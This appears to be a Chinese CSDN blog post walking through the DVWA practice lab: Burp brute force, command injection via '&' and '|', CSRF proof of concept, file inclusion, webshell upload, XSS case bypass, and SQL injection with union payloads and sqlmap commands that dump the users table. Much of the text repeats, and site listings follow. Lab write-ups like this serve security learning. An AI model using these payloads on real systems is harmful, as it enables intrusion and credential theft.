DVWA靶机

最新推荐文章于 2024-04-20 23:19:41 发布
最新推荐文章于 2024-04-20 23:19:41 发布
阅读量224 收藏
点赞数
文章标签: 大数据 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53616768/article/details/125694163
版权

Brute Force(暴力破解)

burp爆破账户和密码,采用集束炸弹

转存失败重新上传取消

2.Commad Execution(命令注入)

low级别

查看源码,没有进行过滤

转存失败重新上传取消

查看文件/127.0.0.1 & ls

转存失败重新上传取消

查看地址

转存失败重新上传取消

medium级别

medium级别将&进行了过滤

将&换成|

地址

转存失败重新上传取消

查看文件

转存失败重新上传取消

3.CSRF

LOW级别

抓CSRF包,带账户密码的,右击生成poc,

转存失败重新上传取消

生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码

转存失败重新上传取消

4.File lnclusion

LOW级别

随便输入一个文件,跳出路径。文件在page后面

转存失败重新上传取消

输入一个存在的文件

转存失败重新上传取消

medium级别

过滤了小写

转存失败重新上传取消

转存失败重新上传取消

5.File Upload

LOW级别

将有一句话木马的php文件上传,并与意见连接

转存失败重新上传取消

Medium级别

修改文件后缀,在上传是用burp抓包,并将后缀名修改回来

转存失败重新上传取消

蚁剑连接成功

转存失败重新上传取消

6.SQL lnjection

账户用户名

转存失败重新上传取消

用户名和数据库名:1'union select database(),user()#

转存失败重新上传取消

数据库版本和操作系统:1' union select version(),@@version_compile_os#

转存失败重新上传取消

数据库表:1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#

转存失败重新上传取消

爆出dvwa库,users表中的账户、密码:1' union select user,password from users#

转存失败重新上传取消

Medium级别

数字型注入:不需要单引号

需要去burp中修改

转存失败重新上传取消

获取用户表名

转存失败重新上传取消

表字段

转存失败重新上传取消

password字段

转存失败重新上传取消

7.SQL lnjection(盲注)

输入1,将网址复制到sqlmap,同时抓包burp,将cookie复制到sqlmap

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" (-u 对网址)

转存失败重新上传取消

加dbs,查出数据库

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" --dbs

转存失败重新上传取消

-D'数据库' #报数据库 , --tables #数据库表

爆4个数据库表

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' --tables

转存失败重新上传取消

-T '表名' --columns #字段名

爆出8个字段

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' -T 'users' --columns

转存失败重新上传取消

-C '要爆的东西'

爆账户密码uid,共5个

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' -T 'users' -C 'username,password,user_id' --dump

转存失败重新上传取消

Medium级别

先用burp抓包,将内容保存到文件(名:medium)

sqlmap -r medium

转存失败重新上传取消

数据库 sqlmap -r medium --dbs

转存失败重新上传取消

爆出24个表

转存失败重新上传取消

低级和中级都一样,就不往下做了

8.XSS reflected(反射型)

LOW

转存失败重新上传取消

Medium

转存失败重新上传取消

High

转存失败重新上传取消

Medium

Burp抓包,修改name出的代码,可以大写绕过

转存失败重新上传取消

转存失败重新上传取消

High

.Brute Force(暴力破解)

burp爆破账户和密码,采用集束炸弹

正在上传…重新上传取消

2.Commad Execution(命令注入)

low级别

查看源码,没有进行过滤

正在上传…重新上传取消

查看文件/127.0.0.1 & ls

正在上传…重新上传取消

查看地址

正在上传…重新上传取消

medium级别

medium级别将&进行了过滤

将&换成|

地址

正在上传…重新上传取消

查看文件

正在上传…重新上传取消

3.CSRF

LOW级别

抓CSRF包,带账户密码的,右击生成poc,

正在上传…重新上传取消

生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码

正在上传…重新上传取消

4.File lnclusion

LOW级别

随便输入一个文件,跳出路径。文件在page后面

正在上传…重新上传取消

输入一个存在的文件

正在上传…重新上传取消

medium级别

过滤了小写

正在上传…重新上传取消

正在上传…重新上传取消

5.File Upload

LOW级别

将有一句话木马的php文件上传,并与意见连接

正在上传…重新上传取消

Medium级别

修改文件后缀,在上传是用burp抓包,并将后缀名修改回来

正在上传…重新上传取消

蚁剑连接成功

正在上传…重新上传取消

XIFIWU
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简单粗暴一分钟搭建DVWA靶机
菜鸟的打怪升级之路
02-21 628
为什么搭建DVWA 为了进行安全渗透学习使用需要搭建一个靶机,具体是什么是DVWA可以自行百度,就是为了安全渗透使用。 操作步骤 首先下载安装phpstudy_pro,本软件是免费的。 下载下载DVWA靶机 安装完成phpstudy_pro,进入安装路径,如果找不到可以右击图标,选择属性,点击快捷方式选项栏,点击打开文件夹所在位置。 本图只为示例,请忽略软件名称。 将下载好的DVWA放到phpstudy_pro软件的www目录下面, 进入DVWA目录下面的config文件中,修改配置文件。 先打开conf
DVWA靶机)-----sql注入简单利用笔记
边城浪子的博客
11-01 379
关于DVWA的介绍网上太多。 实验环境: windows2003服务器(192.168.152.128) DVWA源码包 攻击过程: step1:打开浏览器,设代理 ,Burpsuite设代理 。 step2:抓包如图,保存为sql_low.txt。 网址:http://192.168.152.128/dvwa/vulnerabilities/sqli/ step3:使用sql...
DVWA靶机的搭建
yangjinfu12的博客
07-22 1028
DVWA靶机的搭建 1、LAMP环境的搭建 1) 首先进入root模式 [groot@localhost ~]$ su root 关闭防火墙并设置开机不启动 [root@localhost groot]# firewall-cmd --state #检查防火墙状态 [root@localhost groot]# systemctl stop firewalld #关闭防火墙 [root@localhost groot]# systemctl stop firewalld.service [r
windows服务器配合PhpStudy搭建公网DVWA靶机
最新发布
idjjya的博客
04-20 1032
考虑到新手小白使用windows服务器居多,特出此教程(64位)搭建靶机所需设备及工具:1、windows服务器(自备)2、phpstudy3、DVWA靶机包4、Notepad++ (一款超强的文档编辑器)密码:1y9b开始搭建……
DVWA靶机安装(超详细教程)
weixin_45631954的博客
07-03 1万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、DVWA简介二、安装过程1.安装PHPstudy2.安装dvwa靶机3.配置靶机环境 一、DVWA简介 Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地了解保护Web应用程序的过程,并帮助学生和教师了解受控类中的Web应用程序安全性房间环境。 DVWA的目标是通过简单直接的界面练习一些最常见的Web漏洞
DVWA靶机搭建-基于CentOS Stream系统
zaixiaziyang的博客
05-06 359
Damn Vulnerable Web Application (DVWA)(译注:可以直译为:"该死的"不安全Web应用网站),是一个编码糟糕的、易受攻击的 PHP/MySQL Web应用程序。它的主要目的是帮助安全专业人员在合法的环境中,测试他们的技能和工具,帮助 Web 开发人员更好地了解如何增强 Web 应用程序的安全性,并帮助学生和教师在受控的课堂环境中,了解 Web 应用程序的安全。DVWA的具体目标是通过简单明了的界面,来演练一些最常见的 Web 漏洞,这些漏洞具有不同的难度级别。
k8s环境部署dvwa靶机
09-01
k8s环境部署dvwa靶机
搭建DVWA靶机所需全部资源.rar
10-13
这个名为“搭建DVWA靶机所需全部资源.rar”的压缩包文件,显然是为帮助用户快速、方便地建立自己的DVWA学习环境而准备的。 首先,我们需要了解DVWA的基本概念。DVWA是一个具有各种常见安全漏洞的Web应用,如SQL注入...
DVWA Web渗透靶机
07-31
**DVWA(Damn Vulnerable Web Application)**是一个广泛使用的开源Web应用程序,专为网络安全专业人员、学生和教师设计,提供了一个安全的学习环境,用于实践Web应用程序渗透测试的技术和方法。这个应用包含了各种...
靶机-dvwa修改配置版
05-09
靶机-dvwa修改配置版是一个用于网络安全教育和练习的平台,主要针对Web应用程序的安全漏洞。DVWA(Damn Vulnerable Web Application)是一个开源的Web应用,设计用来帮助安全专业人员测试他们的技能,以及让开发者更...
DVWA、MCIR、pikachu、Mutillidae、BWAPP靶机安装包
03-24
网络安全领域,靶机是一种专门设计用于安全测试和学习的计算机系统或网络环境。这个压缩包文件包含了多个知名的Web安全靶场平台,如DVWA(Damn Vulnerable Web Application)、MCIR(Modular Cybersecurity ...
DVWA靶机搭建
Jerome的博客
05-02 259
DVWA靶机搭建 要用DVWA靶机就先要搭建DVWA靶机, 在搭建时候也找了一些博客,发现都写的莫名其妙,整个人都是懵逼的,按照他的步骤根本就行不通,在找了一些资料后,完成了DVWA靶机的搭建,为了让后面学习者不被其他博客误导,决定在这篇报告上写搭建的方法并且同步更新到我自己写的博客中。 参考资料: https://www.bilibili.com/video/BV18b4y1R7HN?from=search& seid=17676732358378948020 phpstudys是一个PHP调试环
11.DVWA靶机搭建
weixin_42974824的博客
05-09 720
DVWA靶机搭建
php mysql注入靶机,DVWA靶机-sql自动注入
weixin_39866881的博客
03-27 161
1.使用dvwa靶机进行sql注入实战(注:当前靶机安全级别为low)打开sql漏洞,发现输入不同的数字会返回不同的信息,先尝试手工判断是否存在sql注入一般sql注入语句像这样,我们构造的是后面两个单引号里面的内容select * from users where userid='*'输入:' or 1=1#前面一个单引号闭合了查询语句自带的第一个单引号,or 1=1 使得结果永远为真,#则是用...
搭建DVWA渗透测试靶机
weixin_51167520的博客
01-01 3182
实验器材:Windows 2008 windows7 准备一台带有Xampp环境的2008的windows将DVWA的软件包放到c盘xampp目录下的htdoc 进入htdoc点击DVWA的目录下的DVWA_JIsuxia解压 去配置htdoc点击DVWA的目录下config下的config.inc.php右键vim打开编辑 编辑21行的数据库密码,还有24行的端口号 29 30行修改公钥私钥保存退出 打开Xampp如下图编辑(PHP(php.ini)) 打开之后是记事本改成vim格式修改:
Windows终端DVWA靶机搭建
唯以的博客
01-23 591
实验所需安装包 链接:https://pan.baidu.com/s/13FDZNcL4JGBSpu0A2QtvMg 提取码:jhwo 首先安装XAMPP软件 使用的是XAMPP5.6版本 开始搭建DVWA靶场 Site key: 6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb Secret key: 6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K 搭建DVWA到这里就全部结束了 ...
DVWA靶场教程
热门推荐
wxh的博客
01-15 2万+
Burt Force(暴力破解)
一文教会安全测试靶机-DVWA搭建
07-20 1008
一、DVWA简介 DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,并帮助Web开发者更好的理解Web应用安全防范的过程。 DVWA一共包含十个模块分别是: Bruce Force(暴力破解) Command Injection(命令注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload (文件上传漏洞) Insecure CAP
dvwa靶机sql注入
08-04
DVWA靶机中的SQL注入是一种安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,从而获取未授权的访问权限或者获取敏感信息。根据引用[1]和引用[2]中提到的内容,DVWA靶机中的SQL注入分为不同的安全级别,包括Low、Medium、High和Blind注入。 在Low级别的SQL注入中,攻击者可以通过在输入框中输入特定的SQL语句来绕过应用程序的验证,从而执行恶意操作。在Medium级别的SQL注入中,应用程序对输入进行了一定的过滤,但仍存在一些漏洞可以被攻击者利用。在High级别的SQL注入中,应用程序对输入进行了更严格的过滤,但仍然存在一些漏洞可以被攻击者利用。 在Blind注入中,攻击者无法直接获取注入结果,但可以通过构造特定的SQL语句来判断条件是否成立,从而获取敏感信息。Blind注入可以分为不同的级别,包括Low、Medium和High级别。 为了进行SQL注入攻击,攻击者可以使用手工方法或者工具如sqlmap。手工方法需要攻击者具备一定的SQL注入知识和技巧,而工具如sqlmap可以自动化执行注入攻击,提高攻击效率。 为了防御SQL注入攻击,开发人员应该对用户输入进行严格的验证和过滤,使用参数化查询或预编译语句来防止SQL注入攻击。此外,还可以限制数据库用户的权限,避免敏感信息的泄露。 根据引用[3]中的结论,可以通过使用sqlmap工具来获取DVWA靶机中的数据库名和表名。具体的命令可以参考引用[3]中提供的示例。 总之,DVWA靶机中的SQL注入是一种常见的安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,获取未授权的访问权限或者敏感信息。开发人员应该采取相应的防御措施来保护应用程序的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值